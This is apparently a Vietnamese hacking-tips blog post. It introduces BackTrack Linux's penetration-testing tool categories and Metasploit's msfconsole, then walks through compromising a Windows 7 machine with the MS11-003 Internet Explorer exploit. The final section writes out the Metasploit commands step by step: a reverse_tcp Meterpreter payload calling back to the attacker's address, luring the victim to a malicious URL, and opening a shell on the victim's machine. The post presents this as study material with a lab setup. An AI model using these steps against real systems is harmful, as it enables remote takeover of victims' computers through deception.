Trang chủ MMO Youtube Thủ thuật Hack

Wednesday, January 27, 2016

KHAI THÁC LỖ HỔNG HỆ ĐIỀU HÀNH WINDOWS 7




I.GIỚI THIỆU VỀ BACKTRACK.

Backtrack là gì ?

BackTrack là một hệ điều hành mà hầu như hacker  hay quản trị mạng nào cũng đã và đang sử dụng. Bên trong nó đã được tích hợp rất nhiều công cụ phục vụ cho việc kiểm tra và khai thác lỗ hổng bảo mật.

Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập. Trong các định dạng Live DVD, bạn sử dụng có thể Backtrack trực tiếp từ đĩa DVD mà không cần cài nó vào máy của bạn. Backtrack cũng có thể được cài đặt vào ổ cứng và sử dụng như một hệ điều hành.
Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm -IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (4.0), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 8,10. Tính đến ngày 19 tháng bảy năm 2010, Backtrack 4 đã được tải về của hơn 1,5 triệu người sử dụng. Phiên bản mới nhất là Backtrack 5

Các công cụ kiểm tra thâm nhập trong Backtrack có thể được phân loại như sau:
• Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ mail, và như vậy. Thông tin này được thu thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu.
• Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning.
• Vulnerability identification: Trong thể loại này, bạn có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).
• Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web
• Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), bạn có thể sử dụng các công cụ trong thể loại này.
• Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu
• Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, bạn có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của bạn cho các đặc quyền cao nhất.
• Maintaining access: Công cụ trong loại này sẽ có thể giúp bạn trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Bạn có thể cần để có được những đặc quyền cao nhất trước khi các bạn có thể cài đặt công cụ để duy trì quyền truy cập
• Voice Over IP (VOIP): Để phân tích VOIP bạn có thể sử dụng các công cụ trong thể loại này
Backtrack 4 cũng có những tool sử dụng cho:
• Digital forensics: Trong loại này, bạn có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, bạn có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi bạn phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.
• Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi.


II.TỔNG HỢP CÁC CÔNG CỤ KIỂM TRA THÂM NHẬP TRONG BACKTRACK.

Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5 có thể được phân loại như sau:
• Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu.
• Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning.
• Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).
• Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web.
• Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này.
• Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu.
• Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất.
• Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì quyền truy cập.
• Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong thể loại này.
• Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.
• Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi. Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtracklinux.org/downloads/

III.CÔNG CỤ METASPLOIT TRÊN BACKTRACK 5 R3.

Metasploit là công cụ không thể thiếu được của hacker cũng như những Penetration Tester. Metasploit không phải là một công cụ mà nó là một Framework tập hợp rất nhiều chương trình cũng như những công cụ phục vụ cho việc tấn công, kiểm tra độ an toàn và bảo mật của hệ thống.
Master Metasploit: là những bài viết liên quan đến việc sử dụng thành thạo môi trường Metasploit Framework
Pentest : là những bài viết sử dụng metasploit tấn công vào những lỗ hổng bảo mật, cũng như các phương pháp làm tổn thương hệ thống
Trước khi đi vào nội dung tôi muốn nói rằng các bài viết trên đây chỉ là những ghi chép dành cho việc nghiên cứu và mục đích học tập, không nhằm chỉ dẫn cho các bạn script kiddies tấn công vào các hệ thống không được phép.
Msfconsole có lẽ là giao diện phổ biến nhất để khai thác và sử dụng MSF. Nó cung cấp một giao diện điều khiển tập trung “tất cả trong một” và cho phép bạn truy cập hầu như tất cả các tùy chọn có sẵn trong Metasploit Framework.
Lợi ích của Msfconsole

·         Msfconsole là cách duy nhất để truy cập vào hỗ trợ hầu hết các tính năng có trong Metasploit. 
·         Cung cấp một giao diện điều khiển thong qua dòng lệnh tới framwork 
·         Có hầu hết các tính năng và ổn định nhất 
·         Hỗ trợ lệnh đầy đủ và tính năng tự hoàn thiện lênh

·         Thực hiện các lệnh mở rộng bên trong msfconsole ví dụ : ping, nmap …

 Khởi động msfconsole ta gõ lệnh msfconsole từ command line.



Để sử dụng trợ giúp sử dụng tham số -h :



Bên trong môi trường msf ta sử dụng lệnh help để hiển thị các lệnh có thể sử dung trong quá trình này.



Sử dụng tab để hỗ trợ hoàn thành dòng lệnh.


IV.TẤN CÔNG WINDOWS 7 SỬ DỤNG CÔNG CỤ METASPLOIT TRÊN BACKTRACK 5 R3.

1) Chuẩn bị.
- Một máy Attacker chạy hệ điều hành BackTrack 5 R3.
- Một máy Windows 7 làm máy Victim.
2) Thực hiện tấn công Windows 7.
Ta đổi địa chỉ IP 2 máy attacker và victim về cùng một dải mạng. Ta gõ lệnh sau # vi /etc/network/interfaces để sửa lại địa chỉ IP trên máy attacker.

Sau khi chỉnh sửa xong địa chỉ IP ta lưu lại và khởi động lại card mạng bằng lệnh
# /etc/init.d/networking restart
Tiếp tục ta gõ lệnh # msfconsole để khai thác lỗ hổng thông qua công cụ Metasploit. Sau khi gõ lệnh sẽ hiện thị kết quả như hình bên dưới:

Ta tiếp tục gõ lệnh search ms11_003 để tìm kiếm lỗ hổng MS11_003 trên CSDL của Metasploit. Hiển thị kết quả như hình bên dưới là thành công:

Ta gõ tiếp dòng lệnh use exploit/windows/browser/ms11_003_ie_import  , tiếp theo ta thiết lập IP lắng nghe khi có kết nối trả về máy attacker set SRVHOST 10.0.0.2
Sau đó gõ tiếp lệnh set URIPATH / để thiết lập đường dẫn đánh lừa victim.
Gõ lệnh : set payload windows/meterpreter/reverse_tcp với mục đích để chiếm phiên làm việc của victim.
Tạo payload lắng nghe trên địa chỉ của attacker và port 444 bằng lệnh : set LHOST 10.0.0.2
Gõ tiếp exploit để thực thi payload. Mọi thứ hoàn tất và thành công sẽ hiển thị giống như hình bên dưới.

Ta tìm cách đánh lừa người dùng truy cập vào dường dẫn trên máy attacker để chiếm quyền điều khiển. Đường dẫn giống như hình bên dưới:

Người dùng truy cập vào đường dẫn trên máy attacker đã được thiết lập mã độc sẽ hiển thị như hình bên dưới.

Sau khi người dùng nhiễm mã độc trên trình duyệt IE sẽ bị treo và không tắt được, trên máy attacker sẽ hiển thị như hình sau:

Tiếp ta sẽ gõ lệnh sessions và gõ lệnh sessions –i 1 để tương tác với sessions 1.
Gõ lệnh sysinfo để xem thông tin về máy victim.

Bắt đầu chiếm quyền điều khiển máy victim với lệnh shell. Sau đó ta có thể tạo thư mục để đánh dấu mình đã xâm nhập thành công.




Video hướng dẫn:



Hãy để lại bình luận của bạn: